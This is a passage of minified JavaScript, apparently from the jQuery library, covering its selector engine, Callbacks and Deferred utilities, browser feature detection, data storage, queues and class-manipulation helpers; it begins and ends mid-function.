lt(function(t){return t=+t,lt(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}s=at.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?"HTML"!==t.nodeName:!1},r=at.support={},p=at.setDocument=function(e){var n=e?e.ownerDocument||e:w,i=n.defaultView;return n!==f&&9===n.nodeType&&n.documentElement?(f=n,d=n.documentElement,h=!s(n),i&&i.attachEvent&&i!==i.top&&i.attachEvent("onbeforeunload",function(){p()}),r.attributes=ut(function(e){return e.className="i",!e.getAttribute("className")}),r.getElementsByTagName=ut(function(e){return e.appendChild(n.createComment("")),!e.getElementsByTagName("*").length}),r.getElementsByClassName=ut(function(e){return e.innerHTML="<div class='a'></div><div class='a i'></div>",e.firstChild.className="i",2===e.getElementsByClassName("i").length}),r.getById=ut(function(e){return d.appendChild(e).id=b,!n.getElementsByName||!n.getElementsByName(b).length}),r.getById?(o.find.ID=function(e,t){if(typeof t.getElementById!==j&&h){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){return e.getAttribute("id")===t}}):(delete o.find.ID,o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){var n=typeof e.getAttributeNode!==j&&e.getAttributeNode("id");return n&&n.value===t}}),o.find.TAG=r.getElementsByTagName?function(e,n){return typeof n.getElementsByTagName!==j?n.getElementsByTagName(e):t}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},o.find.CLASS=r.getElementsByClassName&&function(e,n){return typeof n.getElementsByClassName!==j&&h?n.getElementsByClassName(e):t},m=[],g=[],(r.qsa=K.test(n.querySelectorAll))&&(ut(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||g.push("\\["+P+"*(?:value|"+B+")"),e.querySelectorAll(":checked").length||g.push(":checked")}),ut(function(e){var t=n.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("t",""),e.querySelectorAll("[t^='']").length&&g.push("[*^$]="+P+"*(?:''|\"\")"),e.querySelectorAll(":enabled").length||g.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),g.push(",.*:")})),(r.matchesSelector=K.test(y=d.webkitMatchesSelector||d.mozMatchesSelector||d.oMatchesSelector||d.msMatchesSelector))&&ut(function(e){r.disconnectedMatch=y.call(e,"div"),y.call(e,"[s!='']:x"),m.push("!=",I)}),g=g.length&&RegExp(g.join("|")),m=m.length&&RegExp(m.join("|")),v=K.test(d.contains)||d.compareDocumentPosition?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},A=d.compareDocumentPosition?function(e,t){if(e===t)return S=!0,0;var i=t.compareDocumentPosition&&e.compareDocumentPosition&&e.compareDocumentPosition(t);return i?1&i||!r.sortDetached&&t.compareDocumentPosition(e)===i?e===n||v(w,e)?-1:t===n||v(w,t)?1:c?F.call(c,e)-F.call(c,t):0:4&i?-1:1:e.compareDocumentPosition?-1:1}:function(e,t){var r,i=0,o=e.parentNode,a=t.parentNode,s=[e],l=[t];if(e===t)return S=!0,0;if(!o||!a)return e===n?-1:t===n?1:o?-1:a?1:c?F.call(c,e)-F.call(c,t):0;if(o===a)return pt(e,t);r=e;while(r=r.parentNode)s.unshift(r);r=t;while(r=r.parentNode)l.unshift(r);while(s[i]===l[i])i++;return i?pt(s[i],l[i]):s[i]===w?-1:l[i]===w?1:0},n):f},at.matches=function(e,t){return at(e,null,null,t)},at.matchesSelector=function(e,t){if((e.ownerDocument||e)!==f&&p(e),t=t.replace(Y,"='$1']"),!(!r.matchesSelector||!h||m&&m.test(t)||g&&g.test(t)))try{var n=y.call(e,t);if(n||r.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(i){}return at(t,f,null,[e]).length>0},at.contains=function(e,t){return(e.ownerDocument||e)!==f&&p(e),v(e,t)},at.attr=function(e,n){(e.ownerDocument||e)!==f&&p(e);var i=o.attrHandle[n.toLowerCase()],a=i&&L.call(o.attrHandle,n.toLowerCase())?i(e,n,!h):t;return a===t?r.attributes||!h?e.getAttribute(n):(a=e.getAttributeNode(n))&&a.specified?a.value:null:a},at.error=function(e){throw Error("Syntax error, unrecognized expression: "+e)},at.uniqueSort=function(e){var t,n=[],i=0,o=0;if(S=!r.detectDuplicates,c=!r.sortStable&&e.slice(0),e.sort(A),S){while(t=e[o++])t===e[o]&&(i=n.push(o));while(i--)e.splice(n[i],1)}return e},a=at.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=a(e)}else if(3===i||4===i)return e.nodeValue}else for(;t=e[r];r++)n+=a(t);return n},o=at.selectors={cacheLength:50,createPseudo:lt,match:Q,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(rt,it),e[3]=(e[4]||e[5]||"").replace(rt,it),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||at.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&at.error(e[0]),e},PSEUDO:function(e){var n,r=!e[5]&&e[2];return Q.CHILD.test(e[0])?null:(e[3]&&e[4]!==t?e[2]=e[4]:r&&J.test(r)&&(n=mt(r,!0))&&(n=r.indexOf(")",r.length-n)-r.length)&&(e[0]=e[0].slice(0,n),e[2]=r.slice(0,n)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(rt,it).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=N[e+" "];return t||(t=RegExp("(^|"+P+")"+e+"("+P+"|$)"))&&N(e,function(e){return t.test("string"==typeof e.className&&e.className||typeof e.getAttribute!==j&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=at.attr(r,e);return null==i?"!="===t:t?(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i+" ").indexOf(n)>-1:"|="===t?i===n||i.slice(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,l){var u,c,p,f,d,h,g=o!==a?"nextSibling":"previousSibling",m=t.parentNode,y=s&&t.nodeName.toLowerCase(),v=!l&&!s;if(m){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===y:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?m.firstChild:m.lastChild],a&&v){c=m[b]||(m[b]={}),u=c[e]||[],d=u[0]===T&&u[1],f=u[0]===T&&u[2],p=d&&m.childNodes[d];while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if(1===p.nodeType&&++f&&p===t){c[e]=[T,d,f];break}}else if(v&&(u=(t[b]||(t[b]={}))[e])&&u[0]===T)f=u[1];else while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===y:1===p.nodeType)&&++f&&(v&&((p[b]||(p[b]={}))[e]=[T,f]),p===t))break;return f-=i,f===r||0===f%r&&f/r>=0}}},PSEUDO:function(e,t){var n,r=o.pseudos[e]||o.setFilters[e.toLowerCase()]||at.error("unsupported pseudo: "+e);return r[b]?r(t):r.length>1?(n=[e,e,"",t],o.setFilters.hasOwnProperty(e.toLowerCase())?lt(function(e,n){var i,o=r(e,t),a=o.length;while(a--)i=F.call(e,o[a]),e[i]=!(n[i]=o[a])}):function(e){return r(e,0,n)}):r}},pseudos:{not:lt(function(e){var t=[],n=[],r=l(e.replace(z,"$1"));return r[b]?lt(function(e,t,n,i){var o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),!n.pop()}}),has:lt(function(e){return function(t){return at(e,t).length>0}}),contains:lt(function(e){return function(t){return(t.textContent||t.innerText||a(t)).indexOf(e)>-1}}),lang:lt(function(e){return G.test(e||"")||at.error("unsupported lang: "+e),e=e.replace(rt,it).toLowerCase(),function(t){var n;do if(n=h?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return n=n.toLowerCase(),n===e||0===n.indexOf(e+"-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===d},focus:function(e){return e===f.activeElement&&(!f.hasFocus||f.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeName>"@"||3===e.nodeType||4===e.nodeType)return!1;return!0},parent:function(e){return!o.pseudos.empty(e)},header:function(e){return tt.test(e.nodeName)},input:function(e){return et.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||t.toLowerCase()===e.type)},first:ht(function(){return[0]}),last:ht(function(e,t){return[t-1]}),eq:ht(function(e,t,n){return[0>n?n+t:n]}),even:ht(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:ht(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:ht(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:ht(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;)e.push(r);return e})}},o.pseudos.nth=o.pseudos.eq;for(n in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})o.pseudos[n]=ft(n);for(n in{submit:!0,reset:!0})o.pseudos[n]=dt(n);function gt(){}gt.prototype=o.filters=o.pseudos,o.setFilters=new gt;function mt(e,t){var n,r,i,a,s,l,u,c=k[e+" "];if(c)return t?0:c.slice(0);s=e,l=[],u=o.preFilter;while(s){(!n||(r=X.exec(s)))&&(r&&(s=s.slice(r[0].length)||s),l.push(i=[])),n=!1,(r=U.exec(s))&&(n=r.shift(),i.push({value:n,type:r[0].replace(z," ")}),s=s.slice(n.length));for(a in o.filter)!(r=Q[a].exec(s))||u[a]&&!(r=u[a](r))||(n=r.shift(),i.push({value:n,type:a,matches:r}),s=s.slice(n.length));if(!n)break}return t?s.length:s?at.error(e):k(e,l).slice(0)}function yt(e){var t=0,n=e.length,r="";for(;n>t;t++)r+=e[t].value;return r}function vt(e,t,n){var r=t.dir,o=n&&"parentNode"===r,a=C++;return t.first?function(t,n,i){while(t=t[r])if(1===t.nodeType||o)return e(t,n,i)}:function(t,n,s){var l,u,c,p=T+" "+a;if(s){while(t=t[r])if((1===t.nodeType||o)&&e(t,n,s))return!0}else while(t=t[r])if(1===t.nodeType||o)if(c=t[b]||(t[b]={}),(u=c[r])&&u[0]===p){if((l=u[1])===!0||l===i)return l===!0}else if(u=c[r]=[p],u[1]=e(t,n,s)||i,u[1]===!0)return!0}}function bt(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function xt(e,t,n,r,i){var o,a=[],s=0,l=e.length,u=null!=t;for(;l>s;s++)(o=e[s])&&(!n||n(o,r,i))&&(a.push(o),u&&t.push(s));return a}function wt(e,t,n,r,i,o){return r&&!r[b]&&(r=wt(r)),i&&!i[b]&&(i=wt(i,o)),lt(function(o,a,s,l){var u,c,p,f=[],d=[],h=a.length,g=o||Nt(t||"*",s.nodeType?[s]:s,[]),m=!e||!o&&t?g:xt(g,f,e,s,l),y=n?i||(o?e:h||r)?[]:a:m;if(n&&n(m,y,s,l),r){u=xt(y,d),r(u,[],s,l),c=u.length;while(c--)(p=u[c])&&(y[d[c]]=!(m[d[c]]=p))}if(o){if(i||e){if(i){u=[],c=y.length;while(c--)(p=y[c])&&u.push(m[c]=p);i(null,y=[],u,l)}c=y.length;while(c--)(p=y[c])&&(u=i?F.call(o,p):f[c])>-1&&(o[u]=!(a[u]=p))}}else y=xt(y===a?y.splice(h,y.length):y),i?i(null,a,y,l):M.apply(a,y)})}function Tt(e){var t,n,r,i=e.length,a=o.relative[e[0].type],s=a||o.relative[" "],l=a?1:0,c=vt(function(e){return e===t},s,!0),p=vt(function(e){return F.call(t,e)>-1},s,!0),f=[function(e,n,r){return!a&&(r||n!==u)||((t=n).nodeType?c(e,n,r):p(e,n,r))}];for(;i>l;l++)if(n=o.relative[e[l].type])f=[vt(bt(f),n)];else{if(n=o.filter[e[l].type].apply(null,e[l].matches),n[b]){for(r=++l;i>r;r++)if(o.relative[e[r].type])break;return wt(l>1&&bt(f),l>1&&yt(e.slice(0,l-1).concat({value:" "===e[l-2].type?"*":""})).replace(z,"$1"),n,r>l&&Tt(e.slice(l,r)),i>r&&Tt(e=e.slice(r)),i>r&&yt(e))}f.push(n)}return bt(f)}function Ct(e,t){var n=0,r=t.length>0,a=e.length>0,s=function(s,l,c,p,d){var h,g,m,y=[],v=0,b="0",x=s&&[],w=null!=d,C=u,N=s||a&&o.find.TAG("*",d&&l.parentNode||l),k=T+=null==C?1:Math.random()||.1;for(w&&(u=l!==f&&l,i=n);null!=(h=N[b]);b++){if(a&&h){g=0;while(m=e[g++])if(m(h,l,c)){p.push(h);break}w&&(T=k,i=++n)}r&&((h=!m&&h)&&v--,s&&x.push(h))}if(v+=b,r&&b!==v){g=0;while(m=t[g++])m(x,y,l,c);if(s){if(v>0)while(b--)x[b]||y[b]||(y[b]=q.call(p));y=xt(y)}M.apply(p,y),w&&!s&&y.length>0&&v+t.length>1&&at.uniqueSort(p)}return w&&(T=k,u=C),x};return r?lt(s):s}l=at.compile=function(e,t){var n,r=[],i=[],o=E[e+" "];if(!o){t||(t=mt(e)),n=t.length;while(n--)o=Tt(t[n]),o[b]?r.push(o):i.push(o);o=E(e,Ct(i,r))}return o};function Nt(e,t,n){var r=0,i=t.length;for(;i>r;r++)at(e,t[r],n);return n}function kt(e,t,n,i){var a,s,u,c,p,f=mt(e);if(!i&&1===f.length){if(s=f[0]=f[0].slice(0),s.length>2&&"ID"===(u=s[0]).type&&r.getById&&9===t.nodeType&&h&&o.relative[s[1].type]){if(t=(o.find.ID(u.matches[0].replace(rt,it),t)||[])[0],!t)return n;e=e.slice(s.shift().value.length)}a=Q.needsContext.test(e)?0:s.length;while(a--){if(u=s[a],o.relative[c=u.type])break;if((p=o.find[c])&&(i=p(u.matches[0].replace(rt,it),V.test(s[0].type)&&t.parentNode||t))){if(s.splice(a,1),e=i.length&&yt(s),!e)return M.apply(n,i),n;break}}}return l(e,f)(i,t,!h,n,V.test(e)),n}r.sortStable=b.split("").sort(A).join("")===b,r.detectDuplicates=S,p(),r.sortDetached=ut(function(e){return 1&e.compareDocumentPosition(f.createElement("div"))}),ut(function(e){return e.innerHTML="<a href='#'></a>","#"===e.firstChild.getAttribute("href")})||ct("type|href|height|width",function(e,n,r){return r?t:e.getAttribute(n,"type"===n.toLowerCase()?1:2)}),r.attributes&&ut(function(e){return e.innerHTML="<input/>",e.firstChild.setAttribute("value",""),""===e.firstChild.getAttribute("value")})||ct("value",function(e,n,r){return r||"input"!==e.nodeName.toLowerCase()?t:e.defaultValue}),ut(function(e){return null==e.getAttribute("disabled")})||ct(B,function(e,n,r){var i;return r?t:(i=e.getAttributeNode(n))&&i.specified?i.value:e[n]===!0?n.toLowerCase():null}),x.find=at,x.expr=at.selectors,x.expr[":"]=x.expr.pseudos,x.unique=at.uniqueSort,x.text=at.getText,x.isXMLDoc=at.isXML,x.contains=at.contains}(e);var O={};function F(e){var t=O[e]={};return x.each(e.match(T)||[],function(e,n){t[n]=!0}),t}x.Callbacks=function(e){e="string"==typeof e?O[e]||F(e):x.extend({},e);var n,r,i,o,a,s,l=[],u=!e.once&&[],c=function(t){for(r=e.memory&&t,i=!0,a=s||0,s=0,o=l.length,n=!0;l&&o>a;a++)if(l[a].apply(t[0],t[1])===!1&&e.stopOnFalse){r=!1;break}n=!1,l&&(u?u.length&&c(u.shift()):r?l=[]:p.disable())},p={add:function(){if(l){var t=l.length;(function i(t){x.each(t,function(t,n){var r=x.type(n);"function"===r?e.unique&&p.has(n)||l.push(n):n&&n.length&&"string"!==r&&i(n)})})(arguments),n?o=l.length:r&&(s=t,c(r))}return this},remove:function(){return l&&x.each(arguments,function(e,t){var r;while((r=x.inArray(t,l,r))>-1)l.splice(r,1),n&&(o>=r&&o--,a>=r&&a--)}),this},has:function(e){return e?x.inArray(e,l)>-1:!(!l||!l.length)},empty:function(){return l=[],o=0,this},disable:function(){return l=u=r=t,this},disabled:function(){return!l},lock:function(){return u=t,r||p.disable(),this},locked:function(){return!u},fireWith:function(e,t){return!l||i&&!u||(t=t||[],t=[e,t.slice?t.slice():t],n?u.push(t):c(t)),this},fire:function(){return p.fireWith(this,arguments),this},fired:function(){return!!i}};return p},x.extend({Deferred:function(e){var t=[["resolve","done",x.Callbacks("once memory"),"resolved"],["reject","fail",x.Callbacks("once memory"),"rejected"],["notify","progress",x.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return x.Deferred(function(n){x.each(t,function(t,o){var a=o[0],s=x.isFunction(e[t])&&e[t];i[o[1]](function(){var e=s&&s.apply(this,arguments);e&&x.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[a+"With"](this===r?n.promise():this,s?[e]:arguments)})}),e=null}).promise()},promise:function(e){return null!=e?x.extend(e,r):r}},i={};return r.pipe=r.then,x.each(t,function(e,o){var a=o[2],s=o[3];r[o[1]]=a.add,s&&a.add(function(){n=s},t[1^e][2].disable,t[2][2].lock),i[o[0]]=function(){return i[o[0]+"With"](this===i?r:this,arguments),this},i[o[0]+"With"]=a.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=g.call(arguments),r=n.length,i=1!==r||e&&x.isFunction(e.promise)?r:0,o=1===i?e:x.Deferred(),a=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?g.call(arguments):r,n===s?o.notifyWith(t,n):--i||o.resolveWith(t,n)}},s,l,u;if(r>1)for(s=Array(r),l=Array(r),u=Array(r);r>t;t++)n[t]&&x.isFunction(n[t].promise)?n[t].promise().done(a(t,u,n)).fail(o.reject).progress(a(t,l,s)):--i;return i||o.resolveWith(u,n),o.promise()}}),x.support=function(t){var n,r,o,s,l,u,c,p,f,d=a.createElement("div");if(d.setAttribute("className","t"),d.innerHTML=" <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",n=d.getElementsByTagName("*")||[],r=d.getElementsByTagName("a")[0],!r||!r.style||!n.length)return t;s=a.createElement("select"),u=s.appendChild(a.createElement("option")),o=d.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t.getSetAttribute="t"!==d.className,t.leadingWhitespace=3===d.firstChild.nodeType,t.tbody=!d.getElementsByTagName("tbody").length,t.htmlSerialize=!!d.getElementsByTagName("link").length,t.style=/top/.test(r.getAttribute("style")),t.hrefNormalized="/a"===r.getAttribute("href"),t.opacity=/^0.5/.test(r.style.opacity),t.cssFloat=!!r.style.cssFloat,t.checkOn=!!o.value,t.optSelected=u.selected,t.enctype=!!a.createElement("form").enctype,t.html5Clone="<:nav></:nav>"!==a.createElement("nav").cloneNode(!0).outerHTML,t.inlineBlockNeedsLayout=!1,t.shrinkWrapBlocks=!1,t.pixelPosition=!1,t.deleteExpando=!0,t.noCloneEvent=!0,t.reliableMarginRight=!0,t.boxSizingReliable=!0,o.checked=!0,t.noCloneChecked=o.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!u.disabled;try{delete d.test}catch(h){t.deleteExpando=!1}o=a.createElement("input"),o.setAttribute("value",""),t.input=""===o.getAttribute("value"),o.value="t",o.setAttribute("type","radio"),t.radioValue="t"===o.value,o.setAttribute("checked","t"),o.setAttribute("name","t"),l=a.createDocumentFragment(),l.appendChild(o),t.appendChecked=o.checked,t.checkClone=l.cloneNode(!0).cloneNode(!0).lastChild.checked,d.attachEvent&&(d.attachEvent("onclick",function(){t.noCloneEvent=!1}),d.cloneNode(!0).click());for(f in{submit:!0,change:!0,focusin:!0})d.setAttribute(c="on"+f,"t"),t[f+"Bubbles"]=c in e||d.attributes[c].expando===!1;d.style.backgroundClip="content-box",d.cloneNode(!0).style.backgroundClip="",t.clearCloneStyle="content-box"===d.style.backgroundClip;for(f in x(t))break;return t.ownLast="0"!==f,x(function(){var n,r,o,s="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",l=a.getElementsByTagName("body")[0];l&&(n=a.createElement("div"),n.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",l.appendChild(n).appendChild(d),d.innerHTML="<table><tr><td></td><td>t</td></tr></table>",o=d.getElementsByTagName("td"),o[0].style.cssText="padding:0;margin:0;border:0;display:none",p=0===o[0].offsetHeight,o[0].style.display="",o[1].style.display="none",t.reliableHiddenOffsets=p&&0===o[0].offsetHeight,d.innerHTML="",d.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",x.swap(l,null!=l.style.zoom?{zoom:1}:{},function(){t.boxSizing=4===d.offsetWidth}),e.getComputedStyle&&(t.pixelPosition="1%"!==(e.getComputedStyle(d,null)||{}).top,t.boxSizingReliable="4px"===(e.getComputedStyle(d,null)||{width:"4px"}).width,r=d.appendChild(a.createElement("div")),r.style.cssText=d.style.cssText=s,r.style.marginRight=r.style.width="0",d.style.width="1px",t.reliableMarginRight=!parseFloat((e.getComputedStyle(r,null)||{}).marginRight)),typeof d.style.zoom!==i&&(d.innerHTML="",d.style.cssText=s+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=3===d.offsetWidth,d.style.display="block",d.innerHTML="<div></div>",d.firstChild.style.width="5px",t.shrinkWrapBlocks=3!==d.offsetWidth,t.inlineBlockNeedsLayout&&(l.style.zoom=1)),l.removeChild(n),n=d=o=r=null)}),n=s=l=u=r=o=null,t
     5 +}({});var B=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,P=/([A-Z])/g;function R(e,n,r,i){if(x.acceptData(e)){var o,a,s=x.expando,l=e.nodeType,u=l?x.cache:e,c=l?e[s]:e[s]&&s;if(c&&u[c]&&(i||u[c].data)||r!==t||"string"!=typeof n)return c||(c=l?e[s]=p.pop()||x.guid++:s),u[c]||(u[c]=l?{}:{toJSON:x.noop}),("object"==typeof n||"function"==typeof n)&&(i?u[c]=x.extend(u[c],n):u[c].data=x.extend(u[c].data,n)),a=u[c],i||(a.data||(a.data={}),a=a.data),r!==t&&(a[x.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=a[x.camelCase(n)])):o=a,o}}function W(e,t,n){if(x.acceptData(e)){var r,i,o=e.nodeType,a=o?x.cache:e,s=o?e[x.expando]:x.expando;if(a[s]){if(t&&(r=n?a[s]:a[s].data)){x.isArray(t)?t=t.concat(x.map(t,x.camelCase)):t in r?t=[t]:(t=x.camelCase(t),t=t in r?[t]:t.split(" ")),i=t.length;while(i--)delete r[t[i]];if(n?!I(r):!x.isEmptyObject(r))return}(n||(delete a[s].data,I(a[s])))&&(o?x.cleanData([e],!0):x.support.deleteExpando||a!=a.window?delete a[s]:a[s]=null)}}}x.extend({cache:{},noData:{applet:!0,embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(e){return e=e.nodeType?x.cache[e[x.expando]]:e[x.expando],!!e&&!I(e)},data:function(e,t,n){return R(e,t,n)},removeData:function(e,t){return W(e,t)},_data:function(e,t,n){return R(e,t,n,!0)},_removeData:function(e,t){return W(e,t,!0)},acceptData:function(e){if(e.nodeType&&1!==e.nodeType&&9!==e.nodeType)return!1;var t=e.nodeName&&x.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),x.fn.extend({data:function(e,n){var r,i,o=null,a=0,s=this[0];if(e===t){if(this.length&&(o=x.data(s),1===s.nodeType&&!x._data(s,"parsedAttrs"))){for(r=s.attributes;r.length>a;a++)i=r[a].name,0===i.indexOf("data-")&&(i=x.camelCase(i.slice(5)),$(s,i,o[i]));x._data(s,"parsedAttrs",!0)}return o}return"object"==typeof e?this.each(function(){x.data(this,e)}):arguments.length>1?this.each(function(){x.data(this,e,n)}):s?$(s,e,x.data(s,e)):null},removeData:function(e){return this.each(function(){x.removeData(this,e)})}});function $(e,n,r){if(r===t&&1===e.nodeType){var i="data-"+n.replace(P,"-$1").toLowerCase();if(r=e.getAttribute(i),"string"==typeof r){try{r="true"===r?!0:"false"===r?!1:"null"===r?null:+r+""===r?+r:B.test(r)?x.parseJSON(r):r}catch(o){}x.data(e,n,r)}else r=t}return r}function I(e){var t;for(t in e)if(("data"!==t||!x.isEmptyObject(e[t]))&&"toJSON"!==t)return!1;return!0}x.extend({queue:function(e,n,r){var i;return e?(n=(n||"fx")+"queue",i=x._data(e,n),r&&(!i||x.isArray(r)?i=x._data(e,n,x.makeArray(r)):i.push(r)),i||[]):t},dequeue:function(e,t){t=t||"fx";var n=x.queue(e,t),r=n.length,i=n.shift(),o=x._queueHooks(e,t),a=function(){x.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return x._data(e,n)||x._data(e,n,{empty:x.Callbacks("once memory").add(function(){x._removeData(e,t+"queue"),x._removeData(e,n)})})}}),x.fn.extend({queue:function(e,n){var r=2;return"string"!=typeof e&&(n=e,e="fx",r--),r>arguments.length?x.queue(this[0],e):n===t?this:this.each(function(){var t=x.queue(this,e,n);x._queueHooks(this,e),"fx"===e&&"inprogress"!==t[0]&&x.dequeue(this,e)})},dequeue:function(e){return this.each(function(){x.dequeue(this,e)})},delay:function(e,t){return e=x.fx?x.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,o=x.Deferred(),a=this,s=this.length,l=function(){--i||o.resolveWith(a,[a])};"string"!=typeof e&&(n=e,e=t),e=e||"fx";while(s--)r=x._data(a[s],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(l));return l(),o.promise(n)}});var z,X,U=/[\t\r\n\f]/g,V=/\r/g,Y=/^(?:input|select|textarea|button|object)$/i,J=/^(?:a|area)$/i,G=/^(?:checked|selected)$/i,Q=x.support.getSetAttribute,K=x.support.input;x.fn.extend({attr:function(e,t){return x.access(this,x.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){x.removeAttr(this,e)})},prop:function(e,t){return x.access(this,x.prop,e,t,arguments.length>1)},removeProp:function(e){return e=x.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,o,a=0,s=this.length,l="string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).addClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):" ")){o=0;while(i=t[o++])0>r.indexOf(" "+i+" ")&&(r+=i+" ");n.className=x.trim(r)}return this},removeClass:function(e){var t,n,r,i,o,a=0,s=this.length,l=0===arguments.length||"string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).removeClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):"")){o=0;while(i=t[o++])while(r.indexOf(" "+i+" ")>=0)r=r.replace(" "+i+" "," ");n.className=e?x.trim(r):""}return this},toggleClass:function(e,t){var n=typeof e;return"boolean"==typeof t&&"string"===n?t?this.addClass(e):this.removeClass(e):x.isFunction(e)?this.each(function(n){x(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if("string"===n){var t,r=0,o=x(this),a=e.match(T)||[];while(t=a[r++])o.hasClass(t)?o.removeClass(t):o.addClass(t)}else(n===i||"boolean"===n)&&(this.className&&x._data(this,"__className__",this.className),this.className=this.className||e===!1?"":x._data(this,"__className__")||"")})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;r>n;n++)if(1===this[n].nodeType&&(" "+this[n].className+" ").replace(U," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,o=this[0];{if(arguments.length)return i=x.isFunction(e),this.each(function(n){var 